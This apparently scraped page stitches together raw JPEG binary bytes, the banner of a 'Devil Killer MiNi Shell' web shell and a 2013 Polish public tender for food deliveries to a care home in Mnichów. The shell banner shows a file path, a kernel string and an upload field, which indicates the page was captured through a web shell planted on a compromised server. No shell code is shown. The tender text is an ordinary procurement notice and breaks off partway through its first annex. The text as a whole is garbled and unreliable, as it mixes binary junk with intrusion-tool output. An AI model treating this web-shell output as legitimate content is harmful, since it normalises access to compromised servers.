JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/510070-N-2013.html

<p class="kh_header"><b>Jędrzejów: Przedmiot zamówienia obejmuje sukcesywne dostawy w 2014 r. , do Domu
Pomocy Społecznej w Mnichowie artykułów ogólnospożywczych  tj. artykułów spożywczych, artykułów mleczarskich, pieczywa, artykułów ciastkarskich i ciast,
mięsa i wędlin, artykułów rybnych, jaj kurzych, mrożonek.</b><br>
<b>Numer ogłoszenia: 510070 - 2013; data zamieszczenia: 10.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Mnichowie , Mnichów 135, 28-300 Jędrzejów, woj. świętokrzyskie, tel. 41 38-73-512, faks 41 38-73-512.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: powiatowa jednostka samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia obejmuje sukcesywne dostawy w 2014 r. , do Domu
Pomocy Społecznej w Mnichowie artykułów ogólnospożywczych  tj. artykułów spożywczych, artykułów mleczarskich, pieczywa, artykułów ciastkarskich i ciast,
mięsa i wędlin, artykułów rybnych, jaj kurzych, mrożonek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje sukcesywne dostawy w 2014 r. , do Domu
Pomocy Społecznej w Mnichowie artykułów ogólnospożywczych  tj. artykułów
spożywczych, artykułów mleczarskich, pieczywa, artykułów ciastkarskich i ciast,
mięsa i wędlin, artykułów rybnych, jaj kurzych, mrożonek.
Zamawiający wymaga : dostawy po dowiezieniu, mają być niezwłocznie wniesione 
przez Wykonawcę, do magazynu Zamawiającego.
Przedmiot zamówienia podzielony jest na następujące zadania :

a) zadanie Nr 1 - dostawy artykułów spożywczych zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 2 do SIWZ. Dostawy dotyczą artykułów :
- produkty przemiału ziarna (CPV 15610000-7) : kasze, płatki, ryż, mąka pszenna.
- skrobia i produkty skrobiowe (CPV 15620000-0) : mąka ziemniaczana.
- olej roślinny (CPV 154 11100-3) : olej jadalny uniwersalny.
- pasztet (CPV 15131310-1) : pasztet drobiowy.
- owoce, warzywa i podobne produkty (CPV 15300000-1) : dżemy, powidła, warzywa 
  przetworzone, soki, owoce suszone (śliwki), groch łuskany (połówki), fasola Jaś.
- cukier i produkty pokrewne (CPV 15830000-5) : cukier biały, cukier waniliowy, cukier
  puder, miód, syrop cukrowy.
- makaron niegotowany (CPV 15851100-9) : makarony.
- kawa, herbata i podobne produkty (CPV 15860000-4) : kawa zbożowa, herbata.
- przyprawy i przyprawy korzenne (CPV 15870000-7) : sól, cynamon, czosnek
  granulowany, gałka muszkatałowa, zioła prowansalskie (mieszanka), przyprawa warzywna do potraw, przyprawa do zup i sosów w płynie, kwasek cytrynowy, soda, ocet, ketchup,majonez, musztarda, pieprz czarny, kminek, przyprawy ziołowe.
- specjalne produkty odżywcze (CPV 15880000-0) : chrupki kukurydziane bezglutenowe, kaszki ryżowo-owocowe, kaszki mleczno-ryżowe z owocami.
- różne produkty spożywcze i produkty suszone (CPV 15890000-3) : drożdże,
  proszek do pieczenia, aromaty, bułka tarta, barszcz biały, przyprawa do zup, kostki
  rosołowe, grzyby suszone, kisiel, budyń, galaretki.
- kakao, czekolada i wyroby cukiernicze (CPV 15840000-8) : kakao, biszkopty, wafle,
  ciastka kruche, paluszki słone, cukierki, czekolada, herbatniki i wafle w czekoladzie.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 2 (formularzu
  cenowym zadania Nr 1).

b) zadanie Nr 2 - dostawy artykułów mleczarskich zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 3 do SIWZ. Dostawy dotyczą artykułów :
- śmietana  (CPV 15512000-0) : śmietany 18%,
- mleko w proszku (CPV 15511700-0) : mleko w proszku,
- masło (CPV 15530000-2) : masła świeżego,
- margaryna  (CPV 15431100-9) : margaryny do smarowania, mixu tłuszczowego,
- jogurt bez dodatków substancji smakowych  (CPV 15551310-1) : jogurtów
  naturalnych,
- jogurt z dodatkiem substancji smakowych (CPV 15551320-4) : jogurtów owocowych,deserów,
- klasyfikowane produkty mleczarskie (CPV  15550000-8) : kefiru,
- maślanka  (CPV  15551500-0) : maślanki,
- pasty serowe do smarowania  (CPV 15545000-0) : serków homogenizowanych
  waniliowych i owocowych, serka wiejskiego i serów topionych,
- ser  twardy (CPV 15544000-3) : sera twardego gouda i edamskiego,
- ser twarogowy  (CPV 15542100-0) : twarogu półtłustego.  
                                                                        
  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 3 (formularzu 
  cenowym zadania Nr 2).

c) zadanie Nr 3 - dostawy pieczywa zgodnie z formularzem cenowym stanowiącym  
    Zał. Nr 4 do SIWZ.  Dostawy dotyczą  artykułów :
- chleb  (CPV 15811100-7) : chleba zwykłego, chleba graham, chleba słonecznikowego,  
- bułeczki (CPV 15811400-0) : bułeczki pszenne, bułeczki graham.     
                                              
  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 4 (formularzu
  cenowym zadania Nr 3).

d) zadanie Nr 4 - dostawy artykułów ciastkarskich i ciast  zgodnie z formularzem cenowym stanowiącym  Zał. Nr 5 do SIWZ. Dostawy dotyczą artykułów :
- wyroby ciastkarskie  (CPV 15812100-4) : bułek drożdżowych z budyniem, serem, 
   jabłkami, jagodami oraz pączków,
- ciasta (CPV 15812200-5) : ciast drożdżowych z makiem, ciast drożdżowych z serem, strucli makowej, babki piaskowej, piernika z jabłkami.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 5 (formularzu
  cenowym zadania Nr 4).

e) zadanie Nr 5 - dostawy mięsa i wędlin zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 6 do SIWZ. Dostawy dotyczą artykułów :
- drób (CPV 15112000-6) : kurczaka świeżego, filetów świeżych z kurczaka, korpusów
   mrożonych z kurczaka, udek świeżych z kurczaka,świeżego mięsa gulaszowego 
   z kurczaka
- podroby  (CPV 15114000-0) : świeżych wątróbek i żołądków z kurczaka,
- wieprzowina (CPV 15113000-3) : świeżej słoniny, świeżej łopatki wieprzowej z/k, 
   świeżego schabu z/k, świeżej karkówki z/k ,
- mięso wołowe  (CPV 15111000-9) : świeżego karku wołowego z/k, świeżej łopatki 
   wołowej z/k,
- wędliny drobiowe (CPV 15131135-0) : pasztetu drobiowego, parówki drobiowej 
   (cienkiej), batonu drobiowego, polędwicy drobiowej, baleronu z indyka,
- produkty wieprzowe (CPV 15131400-9) : kiełbasy : krakowskiej, szynkowej,
  toruńskiej, wiejskiej, zwyczajnej, pieczeni rzymskiej, pieczeni tyrolskiej, szynki wiejskiej, kaszani, kiszki pasztetowej, salcesonu włoskiego, salcesonu wiejskiego, boczku wędzonego.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 6 (formularzu
  cenowym zadania Nr 5).

f) zadanie Nr 6 - dostawy artykułów rybnych zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 7 do SIWZ. Dostawy dotyczą artykułów :
- ryby przetworzone i konserwowane  (CPV 15200000-0) : filetów, płatów mrożonych 
  z : morszczuka, mintaja, mrożonych kostek z mintaja, makreli wędzonej, śledzi solonych Matjas (filety), śledzi w oleju (filety), konserw rybnych : paprykarz szczeciński, śledź w pomidorach, filet z makreli w oleju, filet z makreli w pomidorach.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 7 (formularzu
  cenowym zadania Nr 6).

g) zadanie Nr 7 - dostawy  jaj  zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 8 do SIWZ. Dostawy dotyczą artykułów :
- jaja (CPV  03142500-3) : jaj kurzych.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 8 (formularzu
  cenowym zadania Nr 7).

h) zadanie Nr 8 - dostawy mrożonek zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 9 do SIWZ. Dostawy dotyczą artykułów :
- warzywa mrożone (CPV 15331100-8) : mieszanki warzywnej, marchwi kostka, marchwi z groszkiem, kalafiora, fasolki szparagowej,
- owoce przetworzone (CPV 15332100-5) : mieszanki kompotowej mrożonej.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 9 (formularzu
  cenowym zadania Nr 8).

Przedmiot zamówienia został szczegółowo opisany w załącznikach Nr 2-9 do niniejszej SIWZ (formularzach cenowych poszczególnych zadań)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku udziału w postępowaniu przez Wykonawcę, oceniane będzie przez Zamawiającego zgodnie z formułą spełnia/nie spełnia, na podstawie analizy złożonego przez Wykonawcę oświadczenia o spełnieniu warunków określonych w art.22 ust 1 ustawy Prawo zamówień publicznych w/g wzoru stanowiącego  Załącznik Nr 10 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku udziału w postępowaniu przez Wykonawcę, oceniane będzie   przez Zamawiającego zgodnie z formułą spełnia/nie spełnia, na podstawie analizy :
- złożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art.22 ust.1 ustawy Prawo zamówień publicznych, w/g wzoru stanowiącego Załącznik Nr 10do SIWZ,
- złożonych przez Wykonawcę dokumentów o których mowa w pkt. 7.2 b; 7.2 c SIWZ.
(w przypadku gdy Wykonawca dla spełnienia warunków o których mowa w art.22 ust.1 ppkt 2-4 ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów w/g zasad określonych w art.26 ust.2b ustawy j.w.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku udziału w postępowaniu przez Wykonawcę, oceniane będzie   przez Zamawiającego zgodnie z formułą spełnia/nie spełnia, na podstawie analizy :
- złożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art.22 ust.1 ustawy Prawo zamówień publicznych, w/g wzoru stanowiącego Załącznik Nr 10do SIWZ,
- złożonych przez Wykonawcę dokumentów o których mowa w pkt. 7.2 b; 7.2 c SIWZ.
(w przypadku gdy Wykonawca dla spełnienia warunków o których mowa w art.22 ust.1 ppkt 2-4 ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów w/g zasad określonych w art.26 ust.2b ustawy j.w.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku udziału w postępowaniu przez Wykonawcę, oceniane będzie   przez Zamawiającego zgodnie z formułą spełnia/nie spełnia, na podstawie analizy :
- złożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art.22 ust.1 ustawy Prawo zamówień publicznych, w/g wzoru stanowiącego Załącznik Nr 10do SIWZ,
- złożonych przez Wykonawcę dokumentów o których mowa w pkt. 7.2 b; 7.2 c SIWZ.
(w przypadku gdy Wykonawca dla spełnienia warunków o których mowa w art.22 ust.1 ppkt 2-4 ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów w/g zasad określonych w art.26 ust.2b ustawy j.w.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie tego warunku udziału w postępowaniu przez Wykonawcę, oceniane będzie   przez Zamawiającego zgodnie z formułą spełnia/nie spełnia, na podstawie analizy :
- złożonego przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art.22 ust.1 ustawy Prawo zamówień publicznych, w/g wzoru stanowiącego Załącznik Nr 10do SIWZ,
- złożonych przez Wykonawcę dokumentów o których mowa w pkt. 7.2 b; 7.2 c SIWZ.
(w przypadku gdy Wykonawca dla spełnienia warunków o których mowa w art.22 ust.1 ppkt 2-4 ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów w/g zasad określonych w art.26 ust.2b ustawy j.w.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca zobowiązany jest do złożenia :
1. Wypełnionego formularza oferty, w/g wzoru określonego w Załączniku Nr 1 do SIWZ.
2. Wypełnionego (wypełnionych) i wyliczonego (wyliczonych) formularza (formularzy) cenowego (cenowych) w/g wzoru (wzorów) określonego (określonych) w załączniku (załącznikach) Nr 2-9 do SIWZ. Wykonawca zobowiązany jest do złożenia tylko tych formularzy cenowych ,dotyczących zadań na które składa ofertę.
3. Od Wykonawców, którzy dla spełnienia warunków o których mowa w art.22 ust.1 ppkt.2-4, ustawy Prawo zamówień publicznych, polegają na zasobach innych podmiotów w/g zasad określonych w art. 26 ust.2b w/w ustawy Zamawiający żąda złożenia :
3.1 pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3.2 dokumentów dotyczących w szczególności :
- zakresu dostępnych Wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
- charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Dokumenty te są niezbędne Zamawiającemu dla oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia, oraz do oceny czy stosunek łączący Wykonawcę z tymi podmiotami gwarantował będzie rzeczywisty dostęp do ich zasobów.
3.3 jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy,   a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 7.3 a) - 7.3 b) SIWZ).
4. Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik.
 Pełnomocnictwo winno zawierać w szczególności wskazanie :
-    postępowania o zamówienie publiczne;
-    Wykonawcę ubiegającego się o udzielenie zamówienia,
-   określenie  ustanowionego Pełnomocnika oraz zakres jego umocowania
    (w tym zakres wg pkt 11.1 ppkt 12.d SIWZ).
5. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia
publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie
zamówienia publicznego wykonawców występujących wspólnie w przypadku
wspólnego ubiegania się o udzielenie niniejszego zamówienia.
Pełnomocnictwo winno zawierać w szczególności wskazanie:
-   postępowania o zamówienie publiczne;
- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy wraz z określeniem adresu siedziby;
-  określenie ustanowionego Pełnomocnika oraz zakres jego umocowania
   (w tym zakres wg pkt 11.1 ppkt 12.d SIWZ).
6. Każdy z Wykonawców występujących wspólnie musi złożyć oddzielne dokumenty o których mowa w pkt. 7.3a; 7.3b;7.4 SIWZ.
7. Wykonawcy występujący wspólnie, muszą łącznie złożyć dokumenty o których mowa w pkt. 7.1; 7.2a; 7.7 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może nastąpić na podstawie przesłanek wyszczególnionych w pkt.17.2 SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatjedrzejow.pl /-jednost. organ. powiatu,/-dom pomoc. społ./-zamów. publiczne,/-dostawy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Mnichowie, Mnichów 135, 28-300 Jędrzejów, woj. świętokrzyskie, dział administracyjno-techniczny..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2013 godzina 10:00, miejsce: Dom Pomocy Społecznej w Mnichowie, Mnichów 135, 28-300 Jędrzejów, woj. świętokrzyskie, sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie Nr 1 - dostawy artykułów spożywczych zgodnie z formularzem cenowym stanowiącym  Zał. Nr 2 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- produkty przemiału ziarna (CPV 15610000-7) : kasze, płatki, ryż, mąka pszenna.
- skrobia i produkty skrobiowe (CPV 15620000-0) : mąka ziemniaczana.
- olej roślinny (CPV 154 11100-3) : olej jadalny uniwersalny.
- pasztet (CPV 15131310-1) : pasztet drobiowy.
- owoce, warzywa i podobne produkty (CPV 15300000-1) : dżemy, powidła, warzywa 
  przetworzone, soki, owoce suszone (śliwki), groch łuskany (połówki), fasola Jaś.
- cukier i produkty pokrewne (CPV 15830000-5) : cukier biały, cukier waniliowy, cukier
  puder, miód, syrop cukrowy.
- makaron niegotowany (CPV 15851100-9) : makarony.
- kawa, herbata i podobne produkty (CPV 15860000-4) : kawa zbożowa, herbata.
- przyprawy i przyprawy korzenne (CPV 15870000-7) : sól, cynamon, czosnek
  granulowany, gałka muszkatałowa, zioła prowansalskie (mieszanka), przyprawa warzywna do potraw, przyprawa do zup i sosów w płynie, kwasek cytrynowy, soda, ocet, ketchup,majonez, musztarda, pieprz czarny, kminek, przyprawy ziołowe.
- specjalne produkty odżywcze (CPV 15880000-0) : chrupki kukurydziane bezglutenowe, kaszki ryżowo-owocowe, kaszki mleczno-ryżowe z owocami.
- różne produkty spożywcze i produkty suszone (CPV 15890000-3) : drożdże,
  proszek do pieczenia, aromaty, bułka tarta, barszcz biały, przyprawa do zup, kostki
  rosołowe, grzyby suszone, kisiel, budyń, galaretki.
- kakao, czekolada i wyroby cukiernicze (CPV 15840000-8) : kakao, biszkopty, wafle,
  ciastka kruche, paluszki słone, cukierki, czekolada, herbatniki i wafle w czekoladzie.

